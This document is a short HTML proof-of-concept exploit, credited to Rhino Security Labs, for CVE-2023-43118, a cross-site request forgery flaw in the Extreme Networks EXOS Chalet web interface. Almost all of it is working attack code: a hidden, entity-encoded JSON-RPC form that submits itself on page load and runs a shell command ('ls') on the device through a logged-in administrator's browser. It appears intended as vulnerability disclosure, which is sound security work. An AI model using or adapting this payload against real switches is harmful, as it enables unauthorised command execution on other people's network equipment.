<!--
Author: Dave Yesland @daveysec with Rhino Security Labs
CVE: CVE-2023-43118 
This demonstrates a CSRF vulnerability in Extreme Networks EXOS v32.1.1.6
Opening this in a browser which is authenticated to an admin account in 
EXOS Chalet web application will result in code execution on the OS
using the 'run script shell ls' command via the jsonrpc endpoint.
-->
<html>
  <body>
    <form action="http://<SERVER_IP_HERE>/jsonrpc/" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;jsonrpc&quot;&#58;&#32;&quot;2&#46;0&quot;&#44;&quot;method&quot;&#58;&#32;&quot;cli&quot;&#44;&quot;params&quot;&#58;&#91;&quot;run&#32;script&#32;shell&#32;ls&quot;&#93;&#44;&quot;id&quot;&#58;&quot;1&quot;&#44;&quot;x&quot;&#58;&quot;" value='"}' />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>